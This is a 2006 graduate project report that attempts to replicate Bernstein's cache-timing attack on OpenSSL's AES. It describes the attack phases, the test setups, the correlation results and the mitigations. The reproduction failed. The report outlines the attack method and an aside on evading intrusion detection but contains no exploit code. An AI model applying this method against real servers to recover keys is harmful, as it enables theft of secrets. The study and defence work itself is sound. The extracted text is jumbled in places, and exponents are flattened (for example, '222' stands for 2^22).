ECE 746 Project Report

1

CACHE ATTACKS AGAINST SECRET KEY CRYPTOSYSTEMS
Rajesh Ravi, Lawrence Awuah.

Abstract—: Side Channel cryptanalysis is a growing area of research in Cryptography. Attacks on secret key cryptosystems based on side channel cryptanalysis have had much success in recent times, making designers of such algorithms to be mindful of such attacks while designing their algorithm. This paper analyses Cache Attacks, which are a class of Side Channel attacks. A cache timing attack on OpenSSL implementation of AES was verified. This paper is an extension of work done before in replicating this attack, using different scenarios. Real world situations and the relevance of this attack have been discussed along with the methods that are currently in place to reduce the impact of this attack. Index Terms—- Side-Channel attacks, AES, Cache timing attacks, Open SSL

I. INTRODUCTION

T

raditional

attacks

on

cryptographic

systems

were

conducted on the math of the system, for example, differential and linear cryptanalysis. These methods relied upon the cipher text or cipher text and plain text. In the present day world, it has been proved that encryption devices reveal more information about the cipher than the cipher text itself. This information is called side channel information, which is neither cipher text nor plain text. With the ability to obtain this information, new attacks called side channel attacks were developed, which obtain this information based upon power consumption analysis, timing information, fault analysis and acoustic attacks. One of the pioneers of this field, Paul Kocher has implemented most of these attacks along with his colleagues in real world situations. Some of these attacks haven’t been mitigated yet. Information that is usually leaked during a cryptographic transformation includes Timing data, power consumption data, Electromagnetic radiation, Sound, Faults etc. NIST has taken note of this type of attacks and has also informed that AES is not vulnerable against these attacks.
Manuscript received December 18th, 2006. This work was done as a part of ECE 746 course at George Mason University Rajesh Ravi is a graduate student at George Mason University(e-mail : rravi@gmu.edu) Lawrence Awuah is a graduate student at George Mason University(e-mail: lawuah@gmu.edu). .

However, a specific timing attack which relies on the cache hits and misses, developed by Bernstein was able to find out the key used. This method learns about cache access patterns of various operations and how they leak timing information so that an attacker can obtain a secret key setup at a server. Initial analysis on the verification of this attack on different platforms was done and it was verified that this attack works. However, it was noticed during this analysis that this attack took a very long time and there was a high probability of getting detected. So, in order to speed up the attack process and avoid detection, certain changes have to be made in the attack. They were done by doing the profiling process using a non-zero key, attack using 3 machines in parallel. Second section of our paper gives an overview of the background behind this attack, i.e. discuss about AES, Cache memory and the details of Bernstein’s attack. Third section deals with the investigation of the attack that was done for this paper, giving the results and the reasons behind those results. Fourth section gives an idea of real world scenario and how this attack fares in such a situation. Fifth section discusses mitigation methodologies currently in place or can be taken to prevent or reduce the effect of this attack. Finally, we present the future work that can done in improving this attack and present more scenarios under which this attack can be done where the results can prove to be useful.

II.

BACKGROUND

A. AES stands for Advanced Encryption Standard. It is part of the Federal Information Processing Standards (FIPS) specified by National Institute of Standards and Technology, NIST. The AES, documented in FIPS Publication 197, specifies a symmetric encryption algorithm for use by organizations to protect sensitive information. A detailed specification of AES can be found in [9]. Here, we discuss the specific points that were used in Bernstein’s paper. AES as used in Bernstein’s paper deals with keys of size 16 bytes, represented by n. T the results obtained by him can be extended to longer or shorter key sizes. Any plaintext pi is represented as, pi = (p0,i , . . . , p15,i), where pj,i is the j-th byte of pi. A 16-byte key k = (k0 , . . . , k15) is

ECE 746 Project Report expanded by Key Expansion into 10 round keys K(r) = (K(r)0 , . . . , K(r)15 ) for r = 0, . . . , 10; with k = K(0). After an Add round key operation, AES performs r successive rounds where SubBytes, ShiftRows, MixColums and AddRoundKey are applied to a state. A state is defined as x(r) = (x(r)0 , . . . , x(r)15 ) and it is the result of the r-th AddRoundKey. The initial state is obtained by the first AddRoundKey, i.e. (0) j,i = pj,i kj . We then introduce the r-th round of a plaintext p(r)i = (p(r)0,i , . . . , p(r)15,i) as input of the r-th AddRoundKey, i.e., x(r)j,i = p(r)j,i ⊕ K(r)j . An encryption of plaintext p by AES with key k produces a ciphertext c, denoted as c = EAES(p, k) [2] . Each round r state word is generated as. memory that is installed directly onto the CPU, thereby facilitating very fast access to the frequently used data. Level 2 cache is cache that is external to the microprocessor. A diagram of cache has been give in Figure 1

2

C. Bernstein’s Attack Bernstein’s Attack is based on the fact that AES leaks timing information during cache hits and misses. In his attack, a client computer which is remotely connected to a server sends random plain texts to the server. The server then encrypts the data and instead of replying with ciphertext replies with the time needed for encryption. The attack consists of four stages, which are usually referred to as Profiling, Attacking, Correlation and Brute force key search. Profiling phase: In this phase, the attacker is required to know the value of the key setup at the server. In Bernstein’s attack, a zero key was used to simplify things. However, any known key can be used for this purpose. Let P = { p0,p1………pl} be a set of l+1 random plain texts. The clients sends each of these plain texts and records the time taken for encryption and the value of that byte in a matrix t[16][256]. Also, the number of measurements for per value of a byte is stored in the matrix tnum [16] [256]. After the l+1 encryptions, a chart showing the average computing time required for each individual value the byte in the plain text can take is given. This is actually done by sending plain text’s of different packet sizes, mainly 400 byte, 600 byte and 800 byte packets. The results are written in to various files called study.400, study.600, study.800. Bernstein states that approximately 222 packets are required for the process. This results in a profile of the server system. Attacking Phase: In this phase, the attacker is oblivious to the key setup on the server. The purpose of the attacker is to obtain the key. He sends another set of random plain texts to the server and records the same information of encryption/computing times and the values of the bytes in to matrices as was mentioned before. Different packet sizes are used in the same manner as in profiling phase. The files are stored as attack.400, attack.600, attack.800. A packet of all zeros is sent to the server and the resultant cipher text is stored in a file called attack. Correlation Phase: In this phase, results of profiling phase and attacking phase are combined using a simple correlation and saved in to another matrix c[16][256]. The elements of c are sorted in decreasing order and the highest correlation results are

This happens for a total of ten rounds. The Sbox based lookup of AES makes it vulnerable according to Bernstein, who is a strict believer in not having a Sbox. He also complains that key expansion is not always a good idea because handling many keys simultaneously means that time required to load precomputed values of x from memory may exceed the time needed to recompute them. B. Cache Cache is a special type of computer memory that operates at very high speed. It has many similarities to RAM but much faster than RAM. It is usually used by the CPU to store frequently accessed data. When data is accessed, a copy of it and its address in memory is stored in cache memory. The next time CPU looks for information, it looks in the cache. If the data is there in cache, it is called a hit. The CPU then can retrieve it much faster than getting it from RAM or a hard disk. If the data is not found in the cache, it is called a miss. The CPU then puts a copy of the new data in the cache and processes the information. There are three types of cache misses. A cache miss of instruction, cache read miss of data, cache write miss of data. A cache miss of instruction causes the most delay because the processor has to wait until the instruction is fetched from main memory, which can result in timing information being leaked in case of AES. Cache read miss of data and Cache write of data come next in the decreasing order of delays.

Modern processors have 2 levels of Cache, Level 1 Cache and Level 2 Cache. L1 cache is a very small amount of

ECE 746 Project Report kept according to a deviation threshold which results in highly correlated values being stored as the potential key candidates.

3

Cache Memory Index Tag Data

Index

Data

0

xyz

0

2

abc

1

pdq

1

0

xyz

2

abc

3

rgf

Fig.1. Representation of a Cache

Brute force key search phase: Finally, a brute force key search is applied, wherein all the possible key combinations are used to encrypt a packet containing all zeros and it is compared with ciphertext which was saved in to the attack file in the attacking phase. As the number of correlations increase, the number of potential keys decreases and it results in a quicker results, with the AES key being recovered. The Math behind the attack can simply be stated as follows: The input of the system to the encryption is actually either pj,i ⊕ kj(known key) or p’j,f ⊕ k’j( for secret key) , where p represents plain text and k the key. Bernstein’s method computes the matrices as mentioned before, which have the times for encryption and the byte data, averaging out the individual times of each possible value a singly byte can take independent of other 15 input bytes. So, individual time profiles are arising out of random plaintext encryptions for every byte separately, depending on the key. So, applying the simple heuristic that those pairs satisfying the equality pj,i ⊕ kj = p’j,f ⊕ k’j will also

have a matching time profile [9], naturally leads to correlation between the two matrices calculated. So, the secret key can be derived as: k’j = pj,i ⊕ kj ⊕ p’j,f .

III. INVESTIGATION OF THE ATTACK The purpose of the attack was to extend the work done Robert Salembier [1] in verification of the attack proposed by Bernstein. In [1], Robert has verified the attack using an AMD athlon XP processor, using an Open SSL version .9.7e. He speculated that the attack will take less time if done using three computers in parallel. He also proposed that the attack be verified against other processors and also do the profiling phase with a non-zero key. We did a total of 4 tests, 3 for the complete attack and 1 for the profiling phase using a non-zero key. A. Testing Environment: A total of 7 computers were used. The specifications and the environment under which they were setup are as shown in Table 1.

ECE 746 Project Report

4

Tests 2 and 4 were done with the same setup as Test 1. Test 3 Server: Fedora Core 6 32 bit Pentium M mobile 1.8 GHz, 512 MB RAM L1 Cache : 64 KB L2 Cache : 2 MB GCC Version : 4.1 Open SSL Version : 0.9.7a

TABLE 1: TEST ENVIRONMENT

Test 1 Server: Centos 4.4, X86_64 bit edition, AMD Athlon 3200+ Venice Core, 2.0 GHz 2 GB RAM L1 Cache : 128 KB L2 Cache : 512 KB GCC version : Open SSL version : Attacker 1 Fedora Core 5, 32 bit Pentium 4 mobile 3.06 Ghz, 512 MB RAM L1 Cache : 8 KB data cache L2 Cache: 512 KB GCC version: 4.1 Open SSL version: 0.9.8 b Attacker 2 Fedora Core 5, 32 bit Pentium M mobile 1.8 GHz, 512 MB RAM L1 Cache : 64 KB L2 Cache: 2 MB GCC version: 4.1.1 Open SSL version: 0.9.8 b Attacker 3 Fedora Core 5, 32 bit Pentium M mobile 1.7 GHz, 512 MB RAM L1 Cache : 64 KB L2 Cache: 2 MB GCC version: 4.1.1 Open SSL version: 0.9.8 b

Attacker 1 Fedora Core 6, 32 bit Intel Xeon processor, 512 MB RAM L1 Cache : 64 KB L2 Cache : 512 KB GCC Version : 4.1 Open SSL Version : 0.9.8 b Attacker 2 and Attacker 3 have the same configuration as Attacker1. Network Connection : All computers were connected through a Linksys Switch on a 100 Mbps LAN connection. B. Overview of the tests Test 1 The first test was to simply familiarize ourselves with various parts of source code and setting up all the computers. No information was documented. Profiling and attacking phases with different packet sizes of 400 bytes, 600 bytes and 800 bytes went on smoothly and information was collected for less amount of time than specified in Bernstein’s paper. Correlate program was run and it found very low number of correlations as expected. So, doing a Brute force search was meaningless as it would never finish. The attack was carried for the same amount of time as specified by Bernstein in [1] and it was found out that the amount of correlations were really small. The number of packets that were sent can be determined by checking the file sizes as explained in [1].

Network Connection : All computers were connected through D-Link DI 624 Router on a 100 Mbps LAN connection.

Test 2 This was the actual full scale test done using 3 computers for profiling and attacking 1 server. As

ECE 746 Project Report suggested in [1], it was known when to end the profiling and attacking phases. For study.400, study.600 and study.800 files, about 2^22 packets were sent for each packet size. For the attacking phase, about 2^23 packets were sent. All the information was saved in to the attack.xxx and study.xxx files. Profiling phase took about 6 days, attacking took about 10 days. This is quite different than [1], when individual profiling took 11 days. It was expected that the profiling phase would take 4 days because the largest amount of time taken for profiling was for the 800 byte packet in [1] was 4 and all the three packets were being used for profiling in our case. However, the time required was atleast 2 days more than what was expected. Also, attacking phase took about 10 days, which is 3 days more than as predicted in [1]. The result had lot of correlations. But they were huge with each key location having about 256. Doing a brute force key search on them would prove to be useless as it would never finish. Possible reasons for this were investigated. It was found that openssl had recently used a mitigation technique for the cache timing hazard. More details about the technique used to mitigate the attack have been discussed in the results section. The correlations for this test are given in the Figure 2. Test 3 Learning from Test 2, we chose the same version of openssl that Bernstein used, setting up took 3 days as prior knowledge of compiling and installing older version on Linux was needed and did the attack, this time on a different processor, Pentium M. The test took identical times for profiling and attacking as test 2. There were a lot of improvements in correlations, the least being 16. However, they were still not enough for the brute force attack to give a quick result. The brute force attack may take multiple days to recover the key. However, one important observation was that the version change did affect the number of correlations. This brought us to the conclusion that there was timing information being leaked when the older version was used. The reasons for this were investigated by looking at the code for OpenSSL and keeping track of various changes that were done in various versions. The details of the investigation have been presented in a later section. Another very key factor was that the attacks used in [1] and in the original Bernstein’s paper were done on a processor with much lesser L1 cache size than the processor we used. So, it was determined that much more number of packets have to be sent to the server and get the timing information in order to establish proper correlations. First column in Figures 2 & 3 represents the count for the numbers possible for a particular key byte, which is

5 given by column 2. Column 3 gives all the possible numbers for that particular key byte.

Test 4: This test was done to check if profiling based on a nonzero key will work in giving correlations. For this purpose, we had to know how the code written by Dr. Bernstein actually finds the secret key using the math explained in Section 2 of this paper. This was accomplished after help from the analysis given by [2], explained in the background about the attack. For this purpose, the key at the server was setup to be a known key by getting bytes out of the random number generator of Linux and then using them to setup the key. Study program was used to find out the timing information as was done for the case for a zero key. It printed out information as shown in Figure 4. Information about what the columns mean is clearly given in Bernstein’s paper.

ECE 746 Project Report

6

5c 49 c6 bf d7 1d 4e 5b fa 6a 45 64 23 4a 63 0b – cipher text from all zero plain text 211 0 27 20 a6 25 22 26 21 a0 23 a2 8e a5 a4 43 a7 42 24 aa 47 a3 8b a1 b4 8d .... 248 1 6a 69 68 6b 6e 6c 6d 6f 0a 0f 09 0c 0e 0d 0b 08 4a... 232 2 f6 f0 f3 04 f1 f2 02 01 00 f4 f7 f5 03 05 30 06 07…. 16 3 05 02 06 00 01 04 07 03 94 91 95 90 97 96 93 92….. 181 4 3d 3f 38 39 3a 3c 3b 3e 32 36 31 35 37 30 33 .... 248 5 9d 9b 9f 9e 98 99 7e 9c ea 9a ee 78 7f 79 f4 7a ec 7c e8... 256 6 21 25 23 22 9b 9a 12 87 27 26 9f 99 80 20 24 ae 86….. 248 7 83 81 82 86 87 80 84 85 94 17 92 13 12 93 14 90 16 91.. 246 8 ff fa fc fb 42 f9 fe 46 f8 44 fd 41 6d 47 40 43 68 69 45 6f……. 16 9 c4 c0 c7 c6 c2 c5 c3 c1 e6 e2 e4 e3 e5 e1 e7 e0 ...... 56 10 92 97 93 91 96 94 90 95 18 1d 1c 1f 1e 19 1b 1a bf……… 180 11 42 47 46 40 44 45 43 d7 d1 d6 d5 d3 41 d0 d2 d4 5c... 256 12 1c e7 36 06 e0 41 34 12 e6 ea 09 21 1e e2 ed 13 32... 98 13 e9 ea ec ed e8 ee ef eb cc c8 cd cb c9 ca ce cf d5 ... 256 14 89 8c 8b 8a 8d 8e 8f 75 18 76 2d 73 88 70 19 77 74 ... 152 15 56 50 54 57 55 53 52 51 f0 f1 f7 f4 f6 f3 43 f2 f5 …..

Fig. 2 . Correlations for Test 2

16 0 70 1 32 2 240 3 134 4 32 5 16 6 16 7 16 8 48 9 16 10 16 11 16 12 16 13 16 14 16 15

d9 db d8 d0 d4 d1 df d3 de d5 d2 da d7 dc d6 dd 86 8d 85 82 81 8b 8e 88 89 8f 8a 87 83 8c 84 80 44 40 .... 5f 5b 55 50 51 54 5e 57 5a 59 53 5d 5c 58 56 52 63 66 .... 87 86 8b 89 84 85 81 8a 80 83 8f 82 8e 8d 88 8c fc fd f6............. 86 81 8b 8d 87 82 89 8c 83 85 8a 8f 88 80 8e 84 1a ........ 88 8b 86 82 8c 81 8e 80 83 8a 8f 85 8d 87 89 84 f1 f2 fb fd f4 f8 f9 ff f7 fa f0 f3 fe f5 f6 fc 37 3b 33 32 31 34 3e 38 30 36 3c 3f 3d 3a 39 35 b1 bd b2 b4 b3 b5 bc bf b7 b8 be ba b9 bb b0 b6 23 2d 2b 28 25 27 24 2c 20 26 2e 2f 22 2a 29 21 bd bf b5 bc b6 b0 b8 b1 ba be bb b7 b4 b2 b3 b9 4a 49 4b 40 42 48 47 4c 41 46 4d 43 45 4e …. 96 91 9f 90 92 93 97 9d 9b 98 9e 9a 9c 94 99 95 f1 f0 f3 fd fe f8 f2 fa f7 f4 ff fc f9 fb f6 f5 72 79 70 7a 7f 75 7d 77 73 7c 78 7b 7e 76 71 74 fc f0 ff f7 fe f9 f4 f2 fa f8 fd f3 f1 fb f6 f5 0a 0f 05 04 09 01 02 07 06 03 0b 0d 00 0c 0e 08 82 85 89 8a 87 8e 88 8b 83 84 80 86 8d 8c 81 8f

Fig. 3 . Correlations for Test 3

ECE 746 Project Report

7

0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0

400 400 400 400 400 400 400 400 400 400 400 400 400 400 400 400 400 400 400 400

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

76 67 61 55 58 65 77 79 73 70 59 56 60 51 57 59 51 58 58 66

1574.763 1574.761 1575.279 1578.182 1577.362 1580.369 1574.792 1576.342 1580.055 1583.300 1575.017 1575.143 1576.583 1584.098 1573.298 1578.051 1580.686 1574.517 1576.069 1573.167

15.534 18.666 14.458 28.621 17.599 35.131 14.536 15.722 32.522 52.195 17.270 11.615 14.504 34.880 12.582 22.422 30.320 15.263 27.029 13.393

-3.974 1.782 -3.976 2.280 -3.458 1.851 -0.555 3.859 -1.375 2.311 1.632 4.357 -3.945 1.656 -2.395 1.769 1.318 3.806 4.563 6.239 -3.720 2.248 -3.594 1.552 -2.154 1.873 5.361 4.884 -5.439 1.667 -0.686 2.919 1.949 4.246 -4.220 2.004 -2.668 3.549 -5.570 1.649

Figure 4 : Profiling with a known non-zero key

C. Time and Packets Required D. Test Results All the times that were required for the attack along with the approximate amount of packets sent were recorded for attacks 2 and 3. 222 packets were sent for each packet size. The times for Profiling and attacking are given in tables 1 and 2. As can be seen from the tables, the attacking phase was carried out for a maximum of 223 packets and profiling phase for 222 packets. However, Bernstein had specified that 227 packets were needed for the 800 byte packets. It can be seen from the results that running the attack for those many packets would require atleast 2 months of time. So, it can be finally be concluded that the profiling phase took 5 days and the attacking phase took 10 days. This is just a marginal improvement of 6 days from [1]. Nevertheless, it is a great improvement though not close to what was predicted in [1]. This can be attributed to the fact that the server had much more stuff to do and also the network was flooded with these packets, which required some sort of scheduling by the router in order to be sent to the server. Test 1 gave an idea about how to setup the test environment, how to read the timing information, precautions to take care when stopping and starting the attack. Test 2 results were very discouraging as the attack was allowed to run for sufficient amount of time and the correlations were really small. However, on searching the mailing lists for Open SSL, it was found that the cache timing problem was mitigated partially using simple techniques. The first method was to compress the S-Box sizes from 5 KB to 2 KB + 256 Bytes. This would mean that the whole operation would require much lesser space than what was predicted by Bernstein. Less space required means that these tables are less likely to be thrown out of cache as encryption is continuously done because of packets pouring in from the attackers. Even though performance was not the primary goal [on the contrary, extra shifts "induced" by compressed S-box and longer loop epilogue” induced" by scheduling for L2 have negative effect on performance],the code turned out to run in ~23 cycles per processed byte encrypted/decrypted with 128-bit key. The second method was to schedule S-Boxes references for L2 cache latency which would mean that the tables

ECE 746 Project Report don't have to reside in L1 cache. L2 Cache is usually very large, in order of 2 MB in Pentium M for example. So, leakage of timing information would be very minimal if such method was used

8

TABLE 2: TIME REQUIRED FOR PROFILING.

216 219 222

Study. 400 70 80 4050

3.8 days 70 150 4200

Study.600 90 100 6146

4.4 days 90 190 6336

Study.800 120 140 6652

4.8 days 120 260 6912

TABLE 3: TIME REQUIRED FOR ATTACKING.

216 222 223

Study. 400 80 4050

4 days 70 4290

Study.600 90 6000

4.3 days 90 6090

Study.800 120 140 14140

10 days 120 260 14400

Similar results were obtained when students from another university did the attack [8]. They concluded that the difference in cache sizes resulted in such correlation profile. In [3], authors did experiments on various configurations. They concluded hat the results of the attack are deeply dependent on the type of hardware and software used. They found that key recovery is only effective to recover a limited number of higher bits of each byte. In some of the experiments they conducted, they found that the byte signature which shows the variation of the time required for encryption with respect to average was presenting a distinct single peak for certain architectures and chosen plain texts. Test 3 was giving a lot better correlations when compared to test 2. However, the correlations were not enough to find the key. By inspection it was found that atleast two key bytes were missing which would result in the attack never being success. So, it was concluded that we will need to send more packets in order to get proper correlations which would result in the key.

In [3], the authors did additional experiments over a network apart from the ones we did and found out that there was a difference of two orders of magnitude between the encryption time and the network delays. They had a similar result as we had even after huge number of measurements. They finally hypothesized that the variance of the delays of the network (and/or the protocol stacks) is so much bigger than the variance of the target signal, that there is no practical measurement bound to see the target signal and thus his bare method as it stands today is then not a real threat against remote servers, e.g. timing attacks over the Internet (the network time’s variance will be even larger). Security is given the highest priority in the current world. Operating system makers are giving so much importance to security that one needs to have a glance at what’s being done with respect to side channel cryptanalysis. We observed that when the server was setup and the profiling phase started, packets being sent by the attacker were getting dropped. Firewall of the server was disabled but still they were being dropped. After playing around with all the settings, we found a setting called SE Linux, which is a short form of Security Enhanced Linux, which is being shipped with all version’s of Red hat Inc’s Operating Systems. It is mainly concerned with Kernel level security, such as system calls. This showed that this sort of attack may not be feasible if done against such systems. An attacker would have to get around this problem if he has to do the attack. This may induce more noise which will have to averaged out by sending large amounts of packets. As per our results, one can infer that as the cache size

IV. FEASIBILITY OF THE ATTACK IN REAL WORLD SCENARIO One of the important questions that need to be answered is the relevance of this attack in a real world scenario. For this attack to succeed in real world, an attacker needs to have control over the actual server atleast to an extent that he can setup a known key for profiling phase. If he doesn’t have control over the server, he should atleast have access to a machine with very similar configuration so that he can establish its characteristics with known key, also known as profiling phase.

ECE 746 Project Report increases, difficulty in obtaining results through Bernstein’s simple scheme increases manifold. So, Bernstein’s method has to be improved in order to get results. This was done by the authors of [3]. With three computers in parallel, the attack took a total of 15 days with the profiling and attacking phases taken in to account. However, the secret key which the attacker intends to know may not stay the same for such a long time. The policy of SSH or any other protocol using AES would usually try to change the key atleast every few hours. Since the attack takes days to complete, it is really difficult for such an attack to actually succeed. Intrusion detection systems have become really sophisticated over the years. Tools like Snort can be used to alert the administrator about the type of suspicious traffic flowing in to the network. This can result in the traffic from the attacking system being blocked. So, the attacker should modify this simple attack in a manner that traffic moves in a stealthy manner on a non suspicious port. A total of 275 packets were needed for the Bernstein attack to actually recover the key successfully. A new breed of attacks called Cache collision attacks were proposed which can recover the key with much less packets [2]. An expanded final round attack would need only 213 packets as compared to the huge number of packets needed by Bernstein’s attack.

9 computation itself. All in all, it depends on the architecture of the CPU. In [7], authors Osvik, Shamir and Eran have thoroughly discussed about various schemes to prevent these attacks. Some of these schemes include Avoiding Memory Accesses: In this scheme, the authors suggest that the Table Lookups done by AES can be replaced by an alternative description of the cipher which uses logical operations. Another approach is to place the tables in registers instead of cache. Some architectures like 64 bit, Power PC have enough space in their registers to accomplish this. Alternative Look Up tables : In Open SSL’s implementation of AES, look up tables of size 1024 byte each are used. Several variants of this table can be used, which occupy much lesser space in the cache. These include, 256 byte tables, loading only one table and obtaining others by rotation, etc. Data Oblivious Memory Access pattern : This scheme doesn’t avoid the use of look up tables but instead ensures that the pattern of accesses to the memory is completely oblivious to the data passing through the algorithm. More details can be found in [7]. Cache State Normalization and Process Blocking :

V. MITIGATION METHODOLOGIES

Various methods have been proposed since the original attack was proposed. They improve upon the original paper and provide innovative ways to find AES key using the same basic principle as Bernstein. It is fortunate that all these authors have provided ways to mitigate whatever attack they have proposed in their respective papers so that implementers don’t have to search for ways to counter these proposals. All the mitigation methodologies can be divided in to 2 broad categories. They are Hardware based mitigations and Software based mitigations. Software Mitigations : Bernstein’s main way to prevent his attack was to write constant time AES software. This was not only extremely difficult but would result in performance degradation. His other methods include the suggestion to make sure that S-Boxes remain in the cache almost all the time. This is difficult to achieve because if the processor has a small L1 cache, there is high probability that the SBoxes may be thrown out of the cache by the AES

Normalization of cache can be used to prevent synchronous attacks. It can be achieved by in lot of ways. One such way would be to load all the lookup tables in to the cache. It should be ensured that the table elements are not evicted by the encryption itself, by accesses to the stack, inputs or outputs. Ensuring this is a delicate architecture-dependent affair. However, this method fails to protect against asynchronous attacks. Dynamic Table Storage: This scheme tries to confuse the attacker by loading tables at different memory locations and pseudo randomly selecting which table to load from when encryption or decryption is supposed to take place. However, this means most table lookups will incur cache misses. Another idea would be to move a single table to different memory locations in the cache pseudorandomly. Hiding Timing :

ECE 746 Project Report This scheme tries to inject noise in to the timing measurements by adding random delay. So, the attacker has to send large amount of packets to average out the noise. This way, one can make the attack to be delayed and make the attacker give up on the attack. Operating System support : In this scheme, operating system kernel provides support for cryptographic primitives and operations. This way, the space meant for kernel will be allowed to be used by the cryptographic operations and there by become privileged operations revealing no information. However, this will result in lack of flexibility as the user will have to upgrade the kernel each time there is a patch issued for an algorithm. • • •

10

• • •

Extracting a larger key Verify newer attacks which are an extension of these attacks Verifying the attack on various implementations of the algorithm. Correlation Improvements Brute force key improvements Verification of mitigation techniques

In [2] authors have proposed an extension of Bernstein’s attack which requires much lesser packets and in turn time. They provide the complete source code, which can be used for replicating such attacks VII. CONCLUSION

Brickell, Graunke, Neve, and Seifert (BGNS) combined some of these identified methods for mitigating against this attack into one process [1]. They proposed to use smaller tables while frequently randomizing them and preloading them in to relevant cache lines. BGNS claimed that this was verified experimentally. We tend to agree with them because of our results. Test 2 resulted in very small correlations due to a newer version of Open SSL, which had some of these mitigation techniques implemented in it. Hardware Mitigations: Obviously, best hardware mitigation would be to stop using cache altogether. This will result in severe performance degradation for all applications and hence is not a viable option. This area is very new as no one has verified this type of attack in hardware. However, countermeasures for normal side channel attacks will be a good starting point to use when implementing ciphers in hardware. In a recent paper by Page [11] , he proposes a new cache architecture which partitions cache removing cache as a shared resource and preventing data to be forcibly flushed from cache. Cryptographic co-processors in another interesting idea, explained in [1]. However, as mentioned there, not lot of information is available in this aspect.

The cache timing attack described by Bernstein was verified unsuccessfully by attacking using 3 computers in parallel and on Pentium M architecture. The methodology adopted in [1] was reused to determine the number of packets required to be sent to extract the key successfully. However, they didn’t work owing to various reasons like mitigation of the attack in newer version of Open SSL, large cache sizes of newer processors requiring much greater number of packets to be sent to average out the noise. Math behind profiling using a non-zero key was discussed and was done for one packet size. Real world feasibility of this attack was discussed and it was concluded that Bernstein attack in its original form is not feasible in the current real world situation.

Newer and improved versions of this attack were mentioned in recent papers which will be very useful for further advancement of study in this field. Apart from them, several important items that would be of interest to researchers seeking advancements in this field have been mentioned. This research has brought in to light several advancements in the field of side channel cryptanalysis which will serve as a guide to future work. . REFERENCES
[1] Robert G. Salembier, “Analysis of Cache Timing Attacks against AES”,Manuscript received May 12, 2006. http://ece.gmu.edu/courses/ECE746/project/F06_Project_resources/Sal embier_Cache_ming_Attack.pdf [2] Joseph Bonneau and Ilya Mironov, “Cache-Collision Timing Attacks Against AES” http://www.stanford.edu/~jbonneau/AES_timing.pdf [3] Michael Neve and Jean-Pierre Seifert and Zhenghong Wang, “Cache time-behavior analysis on AES” http://www.cryptologie.be/document/Publications/AsiaCCS_full_06.pdf

VI. FUTURE WORK Original attack proposed by Bernstein is not a good proposition on present architectures and network based attacks. So, it would be a good idea to extend this attack and experimentally verify such attacks. The following items may be of interest to researchers interested in these attacks for future work in this field

ECE 746 Project Report
Daniel J. Bernstein, “Cache-timing attacks on AES”, November 12, 2004. http://cr.yp.to/antiforgery/cachetiming-20050414.pdf [5] Daniel J. Bernstein, “Cache-timing attacks on AES”, April 14, 2005. http://cr.yp.to/antiforgery/cachetiming-20050414.pdf [6] Joseph Bonneau and Ilya Mironov, "Cache-Collision Timing Attacks Against AES," Cryptographic Hardware and Embedded Systems— CHES 2006, pp.201–215, 2006. [7] Dag Arne Osvik, Adi Shamir and Eran Tromer, “Cache Attacks and Countermeasures: the Case of AES” [Extended Version], Revised November 20,2005. http://www.wisdom.weizmann.ac.il/~tromer/papers/cache.pdf [8] Mairéad O'Hanlon, Anthony Tonge, “Investigation Of Cache-Timing Attacks On AES”, Working Papers for 2005. http://computing.dcu.ie/research/papers/2005/0105.pdf [9] E. English and S. Hamilton, "Network security under siege: the timing attack," IEEE, Computer, vol. 29, pp. 95--97, March 1996 [10] Michael Neve and Jean-Pierre Seifert and Zheng hong Wang, “A refined look at Bernstein's AES side-channel analysis”, Fast Abstract in Proceedings of the 2006 ACM Symposium on Information, Computer and Communications Security – Asia. [11] Open SSL toolkit http://www.openssl.org/ [12] D. Page, “Partitioned Cache Architecture as a side channel Defence Mechanism.” 2005. Available from the World Wide Web: <http://eprint.iacr.org/2005/280.pdf> [4]

11